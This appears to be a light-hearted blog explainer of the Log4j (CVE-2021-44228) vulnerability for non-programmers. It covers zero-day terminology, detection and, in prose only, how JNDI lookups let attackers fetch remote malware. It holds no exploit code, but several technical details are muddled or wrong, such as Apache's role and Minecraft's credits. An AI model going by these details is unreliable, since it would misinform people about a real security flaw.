Everything you need to know about Log4j vulnerability
Doomsday prophecies, The 2012 Phenomenon, and don’t look up – If there is one thing humanity loves it’s stories about the end of the world.
But if the apocalypse was once caused by an asteroid the size of Paris heading toward Earth, since Bug 2000 the end of the world seems less physical and more virtual.
The vulnerability in the Log4j library (explained later) burst into our lives like Britney Spears after a decade. Categorized as a zero-day vulnerability, which is code red, this event has been another reminder that despite the strong desire to avoid the issue, cyberspace is an integral part of our lives.
However, some of us, a.k.a the majority of the population, get headaches every time something technical surfaces to our awareness. Dozens of LinkedIn posts have tried, with little success, to explain to the “users” among us, how the ground shifted.
And while the various parables might make Shakespeare proud, they do little to keep non-programmers from getting confused. So if you don’t want to get lost in the hallway conversations, stay tuned.
What is a Zero-day vulnerability?
It’s important to distinguish between three concepts when it comes to zero-day vulnerability:
Zero-day vulnerability – This is a vulnerability discovered in the system or device by hackers, however the vendors are still unaware of it. This increases the chances of the vulnerability being exploited by malicious actors. Sometimes, these vulnerabilities are offered to the highest bidder on the Dark web, other times published in hacker communities for everyone’s free use. Who said there’s no honor among thieves?
When the vulnerability is discovered by the vendors, they have zero days to fix it, or as the pros call it – release a patch. This patch is sent to all users and is designed to prevent the exploitation of the vulnerability, and it’s what we users know as an update.
Zero-day exploitation – Detecting the weakness is not enough, and to gain their wanted effect, hackers need to find a way to exploit it. As long as the vulnerability has not yet been discovered, hackers can write an exploit code that will allow them to use the vulnerability to infiltrate the system.
Zero-day attack – Zero-day attacks are the theft of information in the system or causing damage, by using the specially written exploitation code.
Created with Freepik
Why is this a critical issue?
Developers are constantly searching for bugs in the Software, yet when these vulnerabilities are discovered by hackers, there is a rush to exploit them. These hackers aim to inject an exploit code, which is a code written specifically for the vulnerability found and can use it for malicious purposes. This can lead to users of the software being harmed, often in the form of identity theft. When the vulnerability is discovered by the developers, they rush to release an update that will block exploit options.
So what’s the real issue here?
Well, it’s not that simple to find these weaknesses- sometimes months go by from the moment it is discovered by the hackers to the moment the vendors notice it. A common method of anti-virus systems is scanning for known viruses using a database. However, zero-day attacks are by definition new attacks, so there is no reference to them.
After developing and releasing the update, many end users are in no hurry to update the systems, often a result of an absence of understanding regarding the severity of the situation. This can occur in organizations that have not manned key positions in cybersecurity, such as the CISO (chief information security officer).
The diversity of the targeted components is another obstacle for developers. These vulnerabilities can be detected in many system components including:
- Operating Systems
- Components that are OPEN SOURCE (referred to a model for mass software development. The code is accessible and open to everyone)
- Internet components – IoT (all physical components capable of connecting to the Internet, such as smart TV, smart home, etc.)
Everyone is a potential target, from individuals who use vulnerable systems and have access to sensitive information to global organizations.
Zero-day attacks detection
Some signs can assist the vendors in the discovery of these vulnerabilities, such as a massive amount of traffic or abnormal scans being performed.
In addition, some systems scan user usages and requests and try to figure out if these originate from malicious actors.
An evolving method uses AI (artificial intelligence), to create a database like those used in antiviruses, only instead of searching code sequences known as malicious, the system can learn and detect suspicious interactions.
Log4j- We deserve to understand
The Log4j library is a library that collects logs- data on every movement and request made in the system on which it is installed. Similar to a blog, it allows software developers to keep track of the data. With the help of the data collected, the software developers can analyze the user movements and look for bugs.
The Log4j is programmed by Apache, which is an open-source company that is responsible for sending requests from Internet users (in their professional name – HTTP requests). The library was programmed in Java – a programming language that was very popular in the nineties and is the base for many systems. Initially, it was designed to run on platforms like graphical design software macOS, Windows, and Linux (operating systems like Windows, only it is defined as open source).
The fact that Log4j is Open Source has made it especially popular, and this system is embedded in almost every corner of the global network – from computer games to large shopping sites and vital systems such as water supply, energy, electricity, and more. In other words, everyone is in trouble.
The first alert for a potential vulnerability reached APACHE’s development team on November 24 by ALIBABA’s information security team, the well-known shopping site.
But the general public became aware of this significant problem on December 9, after the Sandbox computer game information security team from Minecraft (yes, the creator of the infamous dance) posted on their blog a warning of the vulnerability to all gamers. The team also released a patch (update), but it was quickly discovered that the problem wasn’t contained to the sandbox game.
The vulnerability has been named CVE-2021-44228 (because it always has a longer name), or more conveniently Log4j, and it exploits a protocol called JNDI.
Java’s JNDI protocol enables retrieval of information from another server, which helps in the process of collecting logs and associating them with the source. This is not necessarily a dangerous thing, because most vendors decide which server to retrieve the information from. However, it was discovered that a request could be sent to JNDI that will direct the protocol to any server in the world, and retrieve an item of your choosing.
For example, hackers could send an HTTP request that redirects the protocol to access my website and download malware. In this case, the JNDI protocol was exploited using another sub-protocol called LDAP. However, the great problem with this vulnerability is the wide variety of ways in which JNDI can be exploited, including using additional protocols called DNS and RMI.